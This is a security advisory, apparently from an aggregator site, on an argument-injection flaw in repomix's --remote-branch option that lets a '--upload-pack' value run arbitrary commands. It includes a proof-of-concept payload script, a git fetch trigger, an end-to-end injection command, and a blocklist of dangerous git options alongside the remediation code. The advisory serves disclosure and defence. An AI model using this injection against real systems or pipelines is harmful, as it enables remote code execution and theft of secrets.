Repomix Argument Injection via (GHSA-9mm9-rqhj-j5mx) -DC-Jul2026-787


The `--remote-branch` CLI option in repomix is vulnerable to argument injection (CWE-88). User-supplied input is passed directly to `git fetch` and `git checkout` subprocesses via `child_process.execFileAsync` without sanitization, without a `--` delimiter, and without validation, so an attacker can inject arbitrary git command-line options. By injecting the `--upload-pack` option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing `dangerousParams` blocklist implemented in `validateGitUrl()`.
The vulnerable code resides in `src/core/git/gitCommand.ts`. The `remoteBranch` parameter is appended directly to the arguments array for git subprocesses without the `--` positional delimiter, so git still parses it as an option. Sink 1 (lines 118-127): `await deps.execFileAsync('git', ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], gitRemoteOpts);`. Sink 2 (lines 148-151): `await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]);`. The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (`--upload-pack`, `--receive-pack`, `--config`, `--exec`) within the `validateGitUrl` function. However, this validation is applied only to the `url` variable and omitted for `remoteBranch`, creating a direct bypass.
The attack flow is:

`repomix --remote-branch <injected_option>` → `src/cli/actions/remoteAction.ts:226` (cloneRepository) → `src/core/git/gitCommand.ts:118` (execGitShallowClone) → `execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])` → git invokes the payload binary via the transport helper. Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.

DailyCVE Form:

Platform: Repomix
Version: <1.14.1
Vulnerability: Argument Injection
Severity: High (8.8)
Date: 2026-05-18
Prediction: 2026-05-27

What Undercode Says:

Analytics:

  • Attack Vector: Remote
  • Privileges Required: None
  • User Interaction: Required
  • CVSS Score: 8.8

Bash Commands & Codes:

[bash]
# Create payload
cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack
# Trigger vulnerability
git init --bare /tmp/dummy-remote.git
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1
# Verify execution
cat /tmp/repomix-pwned.txt

End-to-End Exploit:

repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'

Exploit:

  1. Create an executable payload script that writes system execution context to a file.
  2. Establish a dummy remote and trigger the fetch operation, injecting the `--upload-pack` argument.
  3. The payload executes prior to git protocol validation, achieving arbitrary command execution with the privileges of the user running repomix.

Protection:

  • Primary Fix: Append the `--` delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing `remoteBranch`.
    await deps.execFileAsync(
      'git',
      ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
      gitRemoteOpts,
    );
    
  • Defense in Depth: Update `execGitShallowClone` to validate `remoteBranch` against the existing `dangerousParams` array.
    const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];
    if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
      throw new RepomixError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
    }
    
  • Upgrade to repomix v1.14.1 or later.
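How the two protections above fit together, as an added example that is not repomix's own code: it builds the argv arrays the way the vulnerable and the fixed fetch sinks would (nothing here invokes git), checks whether a user-controlled value would still be parsed by git as an option, and applies the blocklist plus a conservative ref-name allowlist before the checkout sink. Function names, the allowlist rules, and the use of plain `Error` in place of `RepomixError` are assumptions.

```typescript
// Added example, not repomix's own code. Nothing here runs git; it only
// builds and inspects the argv arrays that would be handed to execFileAsync.

// Blocklist as described in the advisory (option names from the page).
const DANGEROUS_PARAMS = ['--upload-pack', '--receive-pack', '--config', '--exec'];

// Pre-fix shape of the fetch sink: the branch lands where git still parses options.
function buildFetchArgsVulnerable(directory: string, remoteBranch: string): string[] {
  return ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch];
}

// Fixed shape: "--" ends option parsing, so a later "-..." value is read as a
// refspec (and rejected by git as an invalid ref), never as a flag.
function buildFetchArgsFixed(directory: string, remoteBranch: string): string[] {
  return ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch];
}

// True when git would read `value` as an option: it starts with "-" and sits
// before any "--" separator in the argv (or there is no separator at all).
function isParsedAsOption(args: string[], value: string): boolean {
  if (!value.startsWith('-')) return false;
  const idx = args.indexOf(value);
  if (idx === -1) return false;
  const sep = args.indexOf('--');
  return sep === -1 || idx < sep;
}

// Defence in depth: the advisory's blocklist plus a conservative allowlist
// (assumed rules, a subset of what git-check-ref-format enforces). A branch
// name never legitimately starts with "-", so that rule alone blocks
// option-shaped input even for option names the blocklist does not know.
function validateRemoteBranch(remoteBranch: string): string {
  if (DANGEROUS_PARAMS.some((param) => remoteBranch.includes(param))) {
    throw new Error(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
  }
  const refNamePattern = /^[A-Za-z0-9][A-Za-z0-9._\/-]*$/; // first char alphanumeric: no leading "-"
  if (
    !refNamePattern.test(remoteBranch) ||
    remoteBranch.includes('..') ||
    remoteBranch.endsWith('.lock')
  ) {
    throw new Error(`Invalid branch name: ${remoteBranch}`);
  }
  return remoteBranch;
}

// Checkout sink: "git checkout -- <name>" would make <name> a pathspec rather
// than a branch, so here the protection is the validator, not the delimiter.
function buildCheckoutArgsSafe(directory: string, remoteBranch: string): string[] {
  return ['-C', directory, 'checkout', validateRemoteBranch(remoteBranch)];
}

// Constructed sample input: an option-shaped "branch" beside a legitimate one.
const injected = '--upload-pack=/tmp/payload';
const legitimate = 'feature/login-fix';
console.log(isParsedAsOption(buildFetchArgsVulnerable('/tmp/work', injected), injected)); // true
console.log(isParsedAsOption(buildFetchArgsFixed('/tmp/work', injected), injected));      // false
console.log(buildCheckoutArgsSafe('/tmp/work', legitimate).join(' '));                    // -C /tmp/work checkout feature/login-fix
```

The `--` delimiter is the structural fix for `fetch` because it works regardless of which option an attacker names; the blocklist only catches the four names it lists, and the allowlist rejects anything that is not ref-shaped. Note the `checkout` caveat in the code: placing `--` before the branch changes its meaning to a path, so that call has to rely on validation of `remoteBranch` instead.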

Impact:

  • Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
  • CI/CD Compromise: If repomix is utilized in automated pipelines where `--remote-branch` is populated by external triggers (e.g., webhook payloads, PRs), attackers can compromise build servers and exfiltrate secrets.


Sources:

Reported By: github.com
